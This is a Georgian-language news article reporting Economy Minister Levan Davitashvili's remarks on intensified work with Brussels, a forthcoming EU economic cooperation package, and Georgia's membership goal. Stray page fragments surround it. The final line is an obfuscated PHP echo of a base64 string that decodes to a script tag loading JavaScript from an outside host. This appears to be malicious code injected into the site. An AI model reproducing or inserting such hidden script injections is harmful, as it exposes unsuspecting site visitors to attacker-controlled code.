celsiusi
ავერსი საქკაბელი

უახლოეს ხანებში საზოგადოება ნახავს ევროკავშირთან, მათ შორის, ეკონომიკური თანამშრომლობის სრულიად ახალ პაკეტს, რომელიც უკვე თვისობრივად ახალ დონეზე გადაიყვანს ქვეყანას დარგობრივი ეკონომიკური ინტეგრაციის კუთხით. იქნება საერთო თანამშრომლობის ახალი დღის წესრიგი, – ამის შესახებ საქართველოს ეკონომიკის მინისტრმა, ლევან დავითაშვილმა განაცხადა.

დავითაშვილის განმარტებით, ევროპული პერსპექტივის მიღების შემდეგ ევროკავშირთან მუშაობა გაათმაგებულია.

„ჩვენ თანმიმდევრული ვართ როგორც ეკონომიკური პოლიტიკის გადაწყვეტილებებსა და ნაბიჯებში, ისე საერთაშორისო პოლიტიკის ნაწილში. დღეს არაერთი განცხადება იყო ჩვენი გუნდის ხელმძღვანელობის, ჩემი კოლეგების მხრიდან, რომ ჩვენთვის მთავარ ამოცანად რჩება ევროკავშირში საბოლოო, სრულყოფილი წევრობა, მათ შორის წევრობის გზაზე ჩვენი სტატუსის პროგრესი. ამ კუთხით მიმდინარეობს მუშაობა ძალიან თავდადებით და მაღალი პროფესიონალიზმით. როდესაც ვსაუბრობ ევროკავშირის წევრობაზე, ეს დამოკიდებულებაშია უამრავი მოთხოვნის შესრულებასთან. ეს გულისხმობს საკანონმდებლო, ნორმატიული აქტების დაახლოებას და მათ იმპლემენტაციას. ამ პოლიტიკის შემუშავებაში საქართველო არის მოწინავე ქვეყანა, საქართველო ალბათ ყველაზე მოწინავეა, რადგან ჩვენ გვყავს მაღალი პასუხისმგებლობის, მაღალი კომპეტენციის მქონე საჯარო სექტორი და საჯარო სექტორში დასაქმებული ადამიანები. ამიტომ მინდა, მადლობა გადავუხადო თითოეულ ადამიანს, ვინც ამ პროცესშია ჩართული და მუშაობს. არ შეიძლება, ჩვენმა თანმიმდევრულმა პოლიტიკამ არ მოიტანოს შედეგი, რადგან სხვა შემთხვევაში ევროკავშირი არ იქნება ის ევროკავშირი, რაც ჩვენ ყველას გვინდა – სამართლიანობაზე დაფუძნებული გაერთიანება, და დიდი იმედი გვაქვს, რომ იქნება სამართლიანი, სწორი შეფასება.

პერსპექტივის მიღების შემდეგ მუშაობა გაათმაგებულია. რადგან ჩვენ არ ვართ დღეს კანდიდატი და პარტნიორი ქვეყნები არიან კანდიდატები, კი არ შენელდა პროცესი, პირიქით, ეს პროცესი უფრო გააქტიურებულია. რეგულარულად მაქვს ინფორმაცია ჩემი სამინისტროდან, რა ინტენსიური მუშა პროცესი მიდის ბრიუსელთან და რამდენად ინტენსიურია კომუნიკაციები, ჩასვლა-ჩამოსვლა, შეხვედრები, განხილვები, კონკრეტული დეტალები. არ მინდა, მოვლენებს წინ გავუსწრო, მაგრამ უახლოეს ხანებში საზოგადოება ნახავს სრულიად ახალ პაკეტს, მათ შორის, ეკონომიკური თანამშრომლობის, რომელიც უკვე თვისობრივად ახალ დონეზე გადაიყვანს ქვეყანას დარგობრივი ეკონომიკური ინტეგრაციის კუთხით. ეს არ არის ევროპული პერსპექტივის მქონე, ეს არის უფრო მეტი სტატუსის მქონე ქვეყნებისთვის. ძალიან მალე ჩვენ ამაზე გვექნება კომენტარები, იქნება საერთო თანამშრომლობის ახალი დღის წესრიგი“, – განაცხადა ლევან დავითაშვილმა.

276
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");